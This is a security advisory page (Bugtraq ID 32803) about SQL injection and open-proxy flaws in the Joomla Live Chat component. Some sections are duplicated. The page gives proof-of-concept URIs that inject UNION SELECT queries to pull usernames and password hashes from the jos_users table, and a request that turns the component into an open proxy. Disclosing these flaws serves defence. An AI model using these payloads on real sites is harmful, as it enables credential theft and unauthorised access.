Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
BID:32803
Info
Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
| Bugtraq ID: | 32803 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6882 CVE-2008-6881 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 12 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | jdc |
| Vulnerable: |
Joompolitan Joomla Live Chat 0 |
| Not Vulnerable: | |
Discussion
Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
Joomla Live Chat is prone to multiple SQL-injection vulnerabilities and an open-proxy vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow attackers to perform certain proxy actions, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Joomla Live Chat is prone to multiple SQL-injection vulnerabilities and an open-proxy vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow attackers to perform certain proxy actions, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs and exploit are available:
http://www.example.comadministrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users
http://www.example.com/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users
http://www.example.com/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.example2.com
Attackers can use a browser to exploit these issues.
The following example URIs and exploit are available:
http://www.example.comadministrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users
http://www.example.com/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users
http://www.example.com/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.example2.com
Solution / Fix
Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
References:
References:
- Joomla Live Chat Homepage (Joompolitan)
- Joomla Live Chat Homepage variant (Joompolitan)